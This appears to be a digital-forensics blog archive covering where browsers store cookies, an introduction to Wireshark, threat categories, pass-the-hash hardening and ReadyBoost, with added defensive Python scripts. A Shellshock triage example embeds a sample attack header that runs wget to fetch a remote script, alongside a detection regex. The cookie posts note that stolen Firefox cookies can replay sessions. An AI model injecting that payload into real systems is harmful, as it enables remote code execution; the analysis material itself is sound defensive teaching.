HTTP Cookies – Part 4 – Safari Cookies

Safari Location

Pretty sure this location has been the same for a number of years now; if not, let me know in the comments:


Removing Safari Cookies

I am not a Mac expert, so I am going to bow out on this part and pass you over to a blog post I have found on the subject 🙂

Posted in Browser Forensics, Cookies, Safari

HTTP Cookies – Part 3 – Chrome Cookies

Chrome Location

Windows 7 onwards:

%LocalAppData%\Google\Chrome\User Data\Default

Unlike Internet Explorer (and like Firefox), Chrome does not use individual text files; it stores cookies in a SQLite database, the file named Cookies inside the profile folder above (recent Chrome releases keep it in a Network sub-folder under Default). To view it you will need a SQLite browser (easy to get via Google), and you will need to copy the file out first, because a running Chrome keeps it locked. Note that on Windows the cookie values are DPAPI-encrypted in the encrypted_value column, so a copied database gives you hosts, names and timestamps but not the values themselves.

Chrome Removal

As with Internet Explorer and Firefox Ctrl + Shift + Del will shortcut you to the delete history page to allow fast removal.

If your wife hasn’t just walked through the door, and you don’t know what Private Browsing is, follow these steps:

  • Click on the “Customize and control Google Chrome” menu in the top right of the browser
  • Choose “Settings” – or type “chrome://settings” in the URL bar
  • Scroll down to the “Privacy” section and click the “Clear browsing data…” button
  • Choose the appropriate tick boxes and time frame from the drop down
Posted in Browser Forensics, Chrome, Cookies

HTTP Cookies – Part 2 – Firefox

Firefox Location

Windows 7 and onwards

Unlike Internet Explorer (and like Chrome), Firefox does not use individual text files for storing cookies; instead it uses a SQLite database, cookies.sqlite in the profile folder, with everything in a single moz_cookies table. To view it you will need a SQLite browser (many free ones via Google). Unlike Chrome on Windows, Firefox keeps the cookie values in the clear, so a copy of this one file is enough to replay a session if it holds a live session cookie.

You will notice Firefox is the only browser (of the big 3) that stores the Cookies in the Roaming folder.
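
The Chrome database from Part 3 above and the Firefox database from this post can both be read with nothing more than Python's built-in sqlite3 module, which saves you the third-party SQLite browser. The script below is an added example and is not code from the original posts. It assumes Chrome's Cookies file (table cookies, times in microseconds since 1601) and Firefox's cookies.sqlite (table moz_cookies, expiry in Unix seconds), builds two constructed in-memory stand-ins for those files, normalises both into one listing, and converts the two different timestamp formats so expiry dates can be compared directly. Copy the real files out of a closed profile first; the running browser keeps them locked.

```python
import sqlite3
from datetime import datetime, timedelta, timezone

# Chrome/WebKit timestamps: microseconds since 1601-01-01 UTC.
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
# Firefox: 'expiry' is Unix seconds; 'creationTime' / 'lastAccessed' are Unix microseconds.
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def webkit_to_datetime(us):
    """Chrome *_utc column -> aware datetime; 0 means a session cookie (no expiry)."""
    return WEBKIT_EPOCH + timedelta(microseconds=us) if us else None


def unix_to_datetime(value, micro=False):
    """Firefox time column -> aware datetime; 0 means 'not set'."""
    if not value:
        return None
    return UNIX_EPOCH + (timedelta(microseconds=value) if micro else timedelta(seconds=value))


def chrome_cookies(conn):
    """Normalise rows from Chrome's 'cookies' table.

    On Windows the plaintext 'value' column is empty and the real value sits in
    'encrypted_value', DPAPI-protected for the logged-on user, so an offline copy
    gives you hosts, names and timestamps but not usable values.
    """
    sql = """SELECT host_key, name, path, creation_utc, expires_utc,
                    is_secure, is_httponly, length(encrypted_value)
             FROM cookies ORDER BY host_key, name"""
    return [
        {"browser": "chrome", "host": host, "name": name, "path": path,
         "created": webkit_to_datetime(created), "expires": webkit_to_datetime(expires),
         "secure": bool(secure), "httponly": bool(httponly),
         "value_encrypted": bool(enc_len)}
        for host, name, path, created, expires, secure, httponly, enc_len in conn.execute(sql)
    ]


def firefox_cookies(conn):
    """Normalise rows from Firefox's 'moz_cookies' table (values are stored in clear)."""
    sql = """SELECT host, name, path, creationTime, expiry, isSecure, isHttpOnly
             FROM moz_cookies ORDER BY host, name"""
    return [
        {"browser": "firefox", "host": host, "name": name, "path": path,
         "created": unix_to_datetime(created, micro=True),
         "expires": unix_to_datetime(expires),
         "secure": bool(secure), "httponly": bool(httponly), "value_encrypted": False}
        for host, name, path, created, expires, secure, httponly in conn.execute(sql)
    ]


def persistent_cookies(cookies, now):
    """Cookies that will still be on disk after 'now' (session cookies go when the browser exits)."""
    return [c for c in cookies if c["expires"] is not None and c["expires"] > now]


def sample_chrome_db():
    """Constructed in-memory stand-in for Default\\Cookies; not a real profile."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE cookies (creation_utc INTEGER, host_key TEXT, name TEXT, value TEXT,
            path TEXT, expires_utc INTEGER, is_secure INTEGER, is_httponly INTEGER,
            encrypted_value BLOB);
        INSERT INTO cookies VALUES
            (13100000000000000, '.example.com', 'sid', '', '/', 13200000000000000, 1, 1, X'01000000D08C9D'),
            (13100000000000000, 'tracker.example.net', 'uid', '', '/', 0, 0, 0, X'01000000D08C9D');
    """)
    return conn


def sample_firefox_db():
    """Constructed in-memory stand-in for cookies.sqlite; not a real profile."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, name TEXT, value TEXT, host TEXT,
            path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER,
            isSecure INTEGER, isHttpOnly INTEGER);
        INSERT INTO moz_cookies VALUES
            (1, 'session', 'abc123', '.example.com', '/', 1555526400,
             1500000000000000, 1500000000000000, 1, 1);
    """)
    return conn


if __name__ == "__main__":
    # On a real case swap the sample connections for sqlite3.connect(path_to_copied_file).
    found = chrome_cookies(sample_chrome_db()) + firefox_cookies(sample_firefox_db())
    for c in found:
        print(f"{c['browser']:8} {c['host']:22} {c['name']:10} expires={c['expires']} "
              f"secure={c['secure']} httponly={c['httponly']} encrypted={c['value_encrypted']}")
```

The two sample rows are deliberately set to the same expiry (13200000000000000 µs after 1601 and 1555526400 s after 1970 are the same instant), which is the quickest way to convince yourself the epoch conversion is right before trusting it on evidence.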

Firefox Removal

As with IE, you can press Ctrl + Shift + Del to access a quick menu to remove browsing history.

I am tempted to rename this the “Oh shit the wife’s home” combination, either that or the “pre-private browsing” combination. Let me know which sounds better in the comments.

You can also remove the cookies via the following steps:

  • Press the “Open Menu” icon in the top right of your browser
  • Go to “Options” – this will open the options tab
  • Go to “Privacy” on the left hand menu ribbon
  • You then have two options:
    • “clear your recent history” – press the down arrow to ensure you clear the correct artefacts
    • “remove individual cookies” – does exactly what it says on the tin.

The “remove individual cookies” option is a good way to view what cookies are installed without the need for a 3rd party SQLite browser.

Posted in Browser Forensics, Cookies, Firefox

HTTP Cookies – Part 1 – Internet Explorer and Microsoft Edge

Finding Internet Explorer/Edge Cookies (Windows 7-10… possibly Vista, but who uses Vista?!)

Microsoft introduced a cool new way of finding your cookies. From the Run prompt (Win+R) or the address bar of any Explorer window type “shell:cookies” and you will be taken straight to the Cookies location, whichever Windows version you are on. Like a Windows Hearthstone 🙂

Location of Cookies

Just in case you want to do it the old fashioned way…

Windows 10

Windows 8.1

Windows 8

Windows 7

As you can see, there was a shift between Windows 8 and 8.1: cookies moved from the “Roaming” folder to “Local”. The “Roaming” folder was designed around “Roaming Profiles”, which are used in some domain environments and allow users to keep things like Desktop icons and favourites when they move to a new machine.

I would suspect one of the reasons for moving them to “Local” is all of the tracking cookies and other nasties that can reside there. You are basically offering free lateral movement to an attacker if they managed to pull off some clever attack based around cookies.

Speaking of which….

“Low” Folders

The “Low” folder was introduced in Vista alongside Internet Explorer’s Protected Mode. Protected Mode runs the browser at low integrity level (Mandatory Integrity Control), and a low-integrity process can only write to locations that are themselves labelled low, so IE keeps its artefacts (cookies, cache, history) in “Low” sub-folders, segregated from the rest of the profile. That segregation is what stops a compromised browser process from dropping files wherever it likes; it is also why you will find two sets of cookies for the same user, one in Cookies and one in Cookies\Low.

Removing Cookies

Like most HTTP cookies these can be removed easily via the browser.

Microsoft Edge

  • Click on the “…” (More) button in the top right of the browser.
  • Click on Settings – Or press Ctrl + Shift + Del to jump to this step
  • Under the heading “Clear browsing data” press the button “Choose what to clear”
  • Ensure “Cookies and saved website data” is selected
  • Press “Clear”

Internet Explorer

  • Press Alt to bring up the menu options and go to “Tools”. Or go to “Tools” from the tool bar.
  • Go to “Internet Options”
  • Under the “General” tab, in the “Browsing History” sub-section, click “Delete” to bring up the options page – or press Ctrl + Shift + Del to jump to this step
  • Select the appropriate tick boxes.

Windows 7’s Internet Explorer has a lot more inverted options. For example, the “Preserve Favorites website data” box stays ticked to keep the cookies for sites in your Favourites while the “Cookies” box on the same page removes the rest, so read each box carefully before clicking Delete. By default the box for “Do Not Track” and Tracking Protection data is also ticked.

Things got a lot simpler by Windows 10.

Posted in Browser Forensics, Cookies, Internet Explorer, Microsoft Edge

Removing Cookies

Do you know how many cookies are tracking you? Have you tried to clear the cookies only to find some things not quite gone? Well I have a product for you!… just kidding, it sounded like an advert, so I went with it.

This post was inspired by the Evercookie, Samy Kamkar’s proof-of-concept “persistent” cookie that writes the same identifier into every storage mechanism it can reach and re-creates any copy you delete from the ones you missed.

Cookie Types

  • HTTP Cookies
    • Internet Explorer
    • Firefox
    • Chrome
    • Apple Safari
  • Flash
  • Android
  • Windows Phone
  • BlackBerry
  • Silverlight
  • CSS (typically on older browsers)
  • HTTP Strict Transport Security (HSTS)
  • Window.Name cache
  • IE User data storage
  • HTML5 Storage
  • Java

[Source and inspiration for this post: ]

Rather than make a really long single post, I have decided to split this up into chunks (that helps me keep from going f-ing nuts too).

I will start with good old HTTP cookies 🙂


Posted in Browser Forensics, Cookies

Wireshark – Introduction

What is Wireshark

According to the Wireshark project’s own description:

Wireshark® is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network.

What does this mean to you? This means Wireshark allows you to view network traffic. The way in which you capture the network traffic further refines this statement, but basically, you can look at network traffic.

What do you mean by capture traffic?

Well, there are two ways to view traffic: live, or from a saved capture. Live captures are useful for seeing what is going across your network, or what your machine is doing at that moment, but analysing live traffic is hard because the data keeps changing under you at each step of the investigation.

A recorded live stream is saved off into a .pcapng file (Wireshark’s default format since version 1.8); the older format is .pcap, and most people will refer to any saved network stream simply as a “pcap” (pronounced “pee-cap”).

Most analysis is done on a pcap file, whether this is a network forensics examiner looking for illegal activity, a malware analyst looking at command and control traffic, or a SOC analyst investigating an intrusion detection signature firing.

Where and how do you capture data?

There are a lot of possible answers to this, but I will give two simple answers.

  1. On your local machine, capturing your own network interface card
  2. On a network, aided by a network device such as a switch with a SPAN (mirror) port, or a specially designed network device known as a tap.

The network traffic is then stored into data files, typically a pcap (pcapng). It is possible to store the data in other formats, but that is outside the scope of this post.

The method of capturing data is not important at this stage. Just bear in mind that Wireshark can itself capture on a local machine (the actual capturing is done by its dumpcap helper, which is why capture privileges are granted to dumpcap rather than to the GUI). There is a GUI and a command line interface (CLI) version: the CLI is “tshark”, which ships alongside Wireshark, uses the same dissectors and display filters, and reads and writes the same capture files; typing “wireshark” at the command line launches the GUI.

Why do you need to capture data?

When a company captures all network traffic entering, leaving and traversing its network, it is said to have “full packet capture”. By having this in place it enables its security analysts to prove whether something happened.

Picture the scene:

You are eagerly sat reviewing ArcSight/LogRhythm/whichever SIEM you have, and an alert pops up from your Intrusion Detection System (IDS). The alert reads something along the lines of “Bash vulnerability attempt”. Immediately you think of Shellshock and try to remember whether that got patched. You ask the IT guy, who shrugs at you and mumbles something about patching causing more problems than it fixes. The trigger packet (typically a single packet) on the IDS shows the attack, with a wget calling out to a tools server to pull down a script.

You are at the Schrödinger’s stage of compromise: you are both totally owned and 100% safe at the same time. Without full packet capture you are now destined to explain to the IT guy why he has to pull log files, patch his server (if it’s not already done) and generally do as you tell him. This requires a booking code, justification, and explaining to various levels of management that you don’t know whether the system is compromised or not.

Now let’s assume you have full packet capture.

You get the same alert, you retrieve the packets from your full packet capture system (there are many ways to do this; let’s say you have a specialist product for it) and begin to investigate. You see the initial packet, you see the tell-tale “() { :;};” of Shellshock sitting in a request header, followed by the call out for the script. Did it work? The server only responded with reset (RST) packets, and the tools server was never contacted at all.

You can now escalate this as a true positive (alert fired correctly) that was thwarted by the security tools (OK, it was thwarted by the fact the server wasn’t vulnerable, but hey). The IT guy can carry on eating his doughnuts and the managers can have ten meetings to decide that you are awesome. Well done.

Ok, slightly silly example, but you get the idea.
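
The triage in the scenario above can be scripted once the packets are out of the full-capture system. What follows is an added example, not code from the original post. It works on packet records of the kind you would pull with tshark -T fields (frame number, source, destination, TCP flags as letters, and the request payload); the records here are constructed for illustration and are not a real capture. The script flags any request carrying the Shellshock “() {” pattern, pulls out the host the injected wget was trying to reach, and then answers the two questions the analyst asked: did the victim send anything other than RST back, and did it ever speak to that host?

```python
import re

# Constructed records in the shape of tshark -T fields output (frame number, src, dst,
# TCP flag letters, payload). These are made up for the example, NOT a real capture.
ATTACKER, VICTIM, TOOLS = "203.0.113.5", "192.0.2.10", "198.51.100.7"

THWARTED = [
    (1, ATTACKER, VICTIM, "S", ""),
    (2, VICTIM, ATTACKER, "SA", ""),
    (3, ATTACKER, VICTIM, "A", ""),
    (4, ATTACKER, VICTIM, "PA",
     "GET /cgi-bin/status HTTP/1.1\r\nHost: 192.0.2.10\r\n"
     "User-Agent: () { :;}; /usr/bin/wget http://198.51.100.7/x.sh -O /tmp/x.sh\r\n\r\n"),
    (5, VICTIM, ATTACKER, "RA", ""),
]

# Same opening, but the victim answers the request and then reaches out to the tools server.
COMPROMISED = THWARTED[:4] + [
    (5, VICTIM, ATTACKER, "PA", "HTTP/1.1 200 OK\r\n\r\n"),
    (6, VICTIM, TOOLS, "S", ""),
]

# The bash function-definition prefix that CVE-2014-6271 (Shellshock) abuses.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")
# Host part of the first URL following a wget/curl in the injected command.
CALLOUT_RE = re.compile(r"\b(?:wget|curl)\b.*?https?://([^/\s:]+)")


def find_attempts(records):
    """Every record whose payload carries the Shellshock pattern."""
    return [r for r in records if SHELLSHOCK_RE.search(r[4])]


def callout_host(payload):
    """The host the injected command would contact, or None if there is no fetch in it."""
    m = CALLOUT_RE.search(payload)
    return m.group(1) if m else None


def triage(records):
    """Classify one capture the way the analyst in the scenario does by hand."""
    attempts = find_attempts(records)
    if not attempts:
        return {"verdict": "no_pattern", "attempts": 0}
    frame, attacker, victim, _, payload = attempts[0]
    later = [r for r in records if r[0] > frame]
    replies = [r for r in later if r[1] == victim and r[2] == attacker]
    only_rst = bool(replies) and all("R" in r[3] for r in replies)
    host = callout_host(payload)
    callout_seen = host is not None and any(r[1] == victim and r[2] == host for r in later)

    if callout_seen:
        verdict = "possible_compromise"   # victim reached the tools server: escalate
    elif only_rst:
        verdict = "thwarted"              # true positive, but the victim refused it
    elif not replies:
        verdict = "inconclusive"          # capture gap: nothing from the victim at all
    else:
        verdict = "needs_review"          # victim answered; read the response body

    return {"verdict": verdict, "attempts": len(attempts), "attacker": attacker,
            "victim": victim, "callout_host": host, "callout_seen": callout_seen}


if __name__ == "__main__":
    for name, pcap in (("thwarted", THWARTED), ("compromised", COMPROMISED)):
        print(name, triage(pcap))
```

The four verdicts are deliberately separate: a capture that simply has no traffic from the victim after the attempt is a collection problem, not evidence of safety, and should not be closed as a thwarted attack.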

So why do I care?

As the scenario shows, being able to inspect packets, or network data, whichever term you prefer, can calm a potentially bad situation by giving you visibility. It takes away the requirement to guess. The program you would use to investigate the pcaps in this scenario is Wireshark. It is free, easy to learn and has the depth to challenge even the most experienced analyst.

By understanding the basics of the program, you will be able to find a wealth of information.

My next set of blog posts will take us through Wireshark basics and up to an intermediate level. The posts will be technical in nature and you will need to have a basic understanding of networks.

Until next time 🙂

Posted in Network Forensics, Shellshock, Wireshark

Types of Threat – Explained

From a high level what are the types or categories of threats faced by the Security professional?

Let’s go over some basics.

  • Internal Authorised
  • Internal Unauthorised
  • Internal to External
  • External to Internal
  • External to External (new)

The first 4 are quite well known; I have added the fifth (external to external), which I will go over below.

Internal Authorised

A person with legitimate access who uses it to carry out unauthorised activities.

Such as accessing, removing, modifying or deleting sensitive data. Adding unauthorised programs or files. Using Software/Services for unauthorised activities.

Examples of Internal Authorised:

  • Edward Snowden – Administrator who stole classified data and released it publicly.​
  • Chelsea (formerly Bradley) Manning – US Army Intelligence Analyst who leaked data to Wikileaks.

Internal Unauthorised

Person without legitimate access who gains access to carry out unauthorised activities. ​

More often associated with opportunist activities, such as removing, modifying or deleting data from a system. Reconnaissance activities can also be a factor, including planting hardware or software key-loggers.

Examples of Internal Unauthorised:​

  • Enemy sympathisers working as support staff during military operations.​
  • Building employees such as cleaners or maintenance staff.​

Internal to External

A person with, or who has gained, access to internal devices, in order to act against external systems.

This person may be working with political motives, exploiting an opportunity, or carrying out a carefully planned agenda. Regardless, the reputational damage to a company will be severe.

Examples of Internal to External:

  • Disgruntled employee looking to damage customer relations.​
  • ‘Hacktivist’ looking to make a statement.

External to Internal

Person who gains access to the internal devices from an external system.

Objectives may include deletion, removal or amendment of data, installation of software or manipulation of internal infrastructure through to defacement and public embarrassment for personal or political gain.

Examples of External to Internal:

  • The Sony breach. Sony were targeted by an external group of attackers who looked to embarrass and influence the company to act in accordance with their agenda. ​
  • Ashley Madison breach. The site was targeted and customer details exposed, with the attacker stating that the company was carrying out immoral business.

External to External

A person who accesses the internal systems from an external source in order to launch an attack on another external target.

These types of ‘pivots’ can either be to hide the attackers true origin or because the pivot point may be a weak link to a more secure target.

Examples of External to External:

  • The Target breach. The retail company Target was breached in order to steal credit card data. The attackers used an HVAC supplier’s network to gain access to Target’s internal systems; from the supplier’s point of view, its network was the pivot.

Why do we care?

Understanding the types of threat that are present helps a business to focus its efforts on those deemed high risk. For example, a smaller company with an intimate and small staff base in a single office may not need to worry much about Internal Unauthorised, as they know the face of each staff member and would notice instantly if a non-staff member was using a machine.

Similarly, a network which does not connect to the internet would worry less about External to Internal and be more concerned with the three Internal threats. External to External may also become a factor for any trusted supplier who has a logical connection to both that network and the internet.

What should we do?

Have three conversations; one with senior management and where they believe the threat to be, another with the technical team(s) and finally one with both technical and management to discuss the differences between them. Bear in mind that Internal Authorised may be in one of those two teams.

So what can we do about it?

As this is pitched at a high level, it is not the place to decide on specific technical actions, but instead to look at high level mitigations, for example a forensic readiness plan will help to recover from such actions. Having a forensic readiness plan in place also helps to reduce the accusations of complacency or negligence on the part of the company.

Build scenarios, consider what might happen under each heading. How could that potentially play out? Once you have basic scenarios in place look at how to audit those scenarios, or even how to prevent them. For example, are all internal routers patched? Are the passwords the same on every local admin account? Do you have centralised logging? Is that logging being monitored? Do you have agreements in place with 3rd party suppliers/cloud services on how to deal with the acquisition of evidence if there was a problem?

I know there are a lot of questions, however this post is more about awareness than answers. People like me can be employed to work with you to answer these questions, but they will be bespoke and not something easily found via Google.

Posted in Cyber, Forensic Readiness Plan, Incident Response, Preparation

Pass-the-hash Mitigation – Tip of the Day

I have recently been researching Pass-the-Hash mitigation techniques and have found the usual advice: don’t log on to workstations with admin accounts, ensure your local admin accounts don’t share a password, and don’t manage a sensitive machine from a less secure, or less sensitive, machine. But the one tip that jumped out as a quick win with (typically) no impact was the ‘Debug programs’ user right in the machine policy.

This right (SeDebugPrivilege) is granted to “Administrators” by default, which means an attacker needs admin rights on the machine (local admin, or via privilege escalation) before tools such as Mimikatz can open LSASS and dump password hashes from memory; Mimikatz’s own ‘privilege::debug’ step is exactly this right being enabled. Removing it from all users, including Administrators, stops the common hash-dumping tools in their tracks. Two caveats: the right lives in the logon token, so existing sessions keep it until the user logs off (check with ‘whoami /priv’), and an attacker who is already local admin can grant it back to themselves or run as SYSTEM, whose token carries the privilege regardless of this policy. Treat it as one layer that raises the bar and leaves an audit trail, not a complete fix; on Windows 8.1 and later, running LSASS as a protected process (RunAsPPL) and Credential Guard are the stronger controls.

To find this in Group Policy, navigate to the following path and open “Debug programs”:

Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment

If debugging is needed, consider creating a debugging group containing accounts without admin rights, allow the user to use the ‘run as’ feature with one of those accounts, and delete the account once the task has been completed.

If the user needs full-time debugging rights, treat their machine as a hostile entity: set up some strong firewall and IDS rules (make sure the machine is logically located behind these devices first 🙂), ensure that credential caching (“Interactive logon: Number of previous logons to cache”) is down to the lowest usable amount (this depends on whether it is a laptop or a workstation), and only ever administer that device with ‘burner admins’, temporary admin accounts that are used for a single task and then deleted. This may sound like a pain, but the alternative is more painful.
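
One way to check this setting across a fleet without clicking through every Group Policy editor is to export the effective security policy with ‘secedit /export /cfg C:\temp\policy.inf’ and read the [Privilege Rights] section, where “Debug programs” appears under its internal name SeDebugPrivilege. The parser below is an added example and not something from the original post. The INF excerpt is constructed to look like a default workstation’s export (the real file is much larger and is written in UTF-16, which load_inf assumes); BUILTIN\Administrators is the well-known SID S-1-5-32-544, which is what the default assignment looks like in the export.

```python
# Well-known SIDs as they appear in the export (a leading '*' marks a SID rather than a name).
KNOWN_SIDS = {
    "S-1-5-32-544": r"BUILTIN\Administrators",
    "S-1-5-32-545": r"BUILTIN\Users",
    "S-1-5-32-555": r"BUILTIN\Remote Desktop Users",
}

# Constructed excerpt of `secedit /export /cfg C:\temp\policy.inf` from a default
# workstation. Not a real export; the real file has many more sections.
SAMPLE_INF = """[Unicode]
Unicode=yes
[Privilege Rights]
SeDebugPrivilege = *S-1-5-32-544
SeRemoteInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-555
SeDenyNetworkLogonRight =
[Version]
signature="$CHICAGO$"
Revision=1
"""


def load_inf(path):
    """Read a secedit export; the tool writes UTF-16 with a BOM, which 'utf-16' handles."""
    with open(path, encoding="utf-16") as fh:
        return fh.read()


def parse_privilege_rights(inf_text):
    """Return {user_right: [holder, ...]} from the [Privilege Rights] section.

    Holders are SIDs with the '*' stripped, or plain account names for entries
    secedit could not resolve to a SID. An empty list means 'assigned to no one',
    which is what the hardened setting looks like.
    """
    rights, section = {}, None
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section != "Privilege Rights" or "=" not in line:
            continue
        name, _, value = line.partition("=")
        holders = [h.strip().lstrip("*") for h in value.split(",") if h.strip()]
        rights[name.strip()] = holders
    return rights


def describe(holder):
    """Friendly name for well-known SIDs, the raw value for anything else."""
    return KNOWN_SIDS.get(holder, holder)


def audit_debug_privilege(rights, allowed=()):
    """Flag any holder of SeDebugPrivilege that is not on the allow-list.

    The recommendation in the post is an empty allow-list: nobody, Administrators included.
    """
    holders = rights.get("SeDebugPrivilege", [])
    unexpected = [describe(h) for h in holders if h not in allowed]
    return {"holders": [describe(h) for h in holders], "unexpected": unexpected,
            "ok": not unexpected}


if __name__ == "__main__":
    # On a real box: rights = parse_privilege_rights(load_inf(r"C:\temp\policy.inf"))
    rights = parse_privilege_rights(SAMPLE_INF)
    result = audit_debug_privilege(rights)
    print("Debug programs held by:", result["holders"] or ["(nobody)"])
    print("OK" if result["ok"] else "FIX: remove " + ", ".join(result["unexpected"]))
```

Run the export on a handful of machines and diff the parsed dictionaries; a box where SeDebugPrivilege has quietly grown an extra SID is exactly the kind of thing a local admin granting themselves the right back looks like.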

Posted in Group Policy, Hardening, Incident Response, pass the hash, Pen Testing, Preparation, Research

Force Enabling ReadyBoost Windows 7/8

Whilst writing a presentation on USB Forensics, I hit a problem with ReadyBoost being disabled on my virtual machine. The message read:

This device cannot be used for ReadyBoost. ReadyBoost is not enabled on this computer because the system disk is fast enough that ReadyBoost is unlikely to provide additional benefit.


Looking around on the internet, most answers point to setting the Superfetch service to Automatic and starting it. This does not fix this error: ReadyBoost is working, but thinks it knows best!

After a lot of annoying pages I decided to take matters into my own hands! Within the SYSTEM hive (under CurrentControlSet) is the Services key, and under there is “rdyboost” (i.e. HKLM\SYSTEM\CurrentControlSet\Services\rdyboost); this contains all of the parameters ReadyBoost uses to decide whether your USB stick is up to the challenge.


Under the “AttachState” subkey there will be a number of values, one per device; on this VM there are 2x USB devices and 1x HDD, but on my live system it is not so easy, as there are several HDDs all with ambiguous names (I found the right one by trial and error). The value will be DWORD=2 to produce the above error; simply set it to DWORD=0 to allow ReadyBoost to come back to life.

The properties of the USB stick now show the following:


Although the USB stick is not fast enough to be used, it does prove that ReadyBoost is now working. The reason for setting this up was to populate the EMDMgmt key (under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion) for forensic analysis, as that is where ReadyBoost records the devices it has tested.

Posted in ReadyBoost, USB Forensics, Windows Forensics, Windows Registry Forensics

USB Roadmap v2

A quick update to the USB Roadmap: a few comments on the first version were about the arrows. They were a little overwhelming and annoying, so I thought I would re-arrange it a little.

I will look at any changes I can make to the map itself over this weekend, as I will be using it during a presentation I am planning for the lightning track at BSides London. This would be the first time I have done a public presentation, so wish me luck 🙂


All of the data is identical on this one (except I added the word “enum” before USBSTOR to show it lives next door to “USB”)

Apologies for the lack of posts recently, I have started a new job which gives me less thinking time than my old one. This is a good thing, it means I am busier, sadly the blog has been neglected. I will do what I can to begin adding updates again soon!

Posted in USB Forensics